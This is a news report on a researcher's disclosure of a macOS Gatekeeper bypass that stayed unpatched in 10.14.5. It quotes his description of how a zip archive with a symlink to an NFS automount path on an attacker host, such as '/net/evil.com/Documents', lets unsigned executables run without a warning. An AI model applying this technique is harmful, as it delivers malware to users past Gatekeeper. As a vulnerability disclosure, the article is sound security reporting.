Security researcher Filippo Cavallarin has publicized what he says is a way to bypass the Gatekeeper security functionality of macOS. The bypass remains unaddressed by Apple as of last week’s macOS 10.14.5 release.
Gatekeeper is a macOS security tool that verifies applications immediately after they are downloaded. This prevents applications from being run without user consent. When a user downloads an app from outside of the Mac App Store, Gatekeeper is used to check that the code has been signed by Apple. If the code has not been signed, the app won’t open without the user giving direct permission.
Cavallarin writes on his blog, however, that Gatekeeper’s functionality can be completely bypassed. In its current implementation, Gatekeeper considers both external drives and network shares as “safe locations.” This means that it allows any application contained in those locations to run without checking the code again. He goes on to explain the user can “easily” be tricked into mounting network share drive, and that anything in that folder can then pass Gatekeeper.
The security researcher explains:
The first legit feature is automount (aka autofs) that allows a user to automatically mount a network share just by accessing a “special” path, in this case, any path beginning with “/net/”.
For example ‘ls /net/evil-attacker.com/sharedfolder/’ will make the os read the content of the ‘sharedfolder’ on the remote host (evil-attacker.com) using NFS.
The second legit feature is that zip archives can contain symbolic links pointing to an arbitrary location (including automount enpoints) and that the software on MacOS that is responsable to decompress zip files do not perform any check on the symlinks before creatig them.
An example of how this would work:
To better understand how this exploit works, let’s consider the following scenario: An attacker crafts a zip file containing a symbolic link to an automount endpoint she/he controls (ex Documents -> /net/evil.com/Documents) and sends it to the victim.
The victim downloads the malicious archive, extracts it and follows the symlink.
Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this tecnique very effective and hard to spot.
Cavallarin says that he informed Apple of this flaw on February 22nd, and that the company was supposed to address it with the release of macOS 10.14.5 last week. As of that release, however, the loophole remains unaddressed and Cavallarin says Apple has stopped responding to his emails. He is publicizing the flaw today as the 90-day window he gave Apple has lasped.
Watch a video demonstration of the flaw below: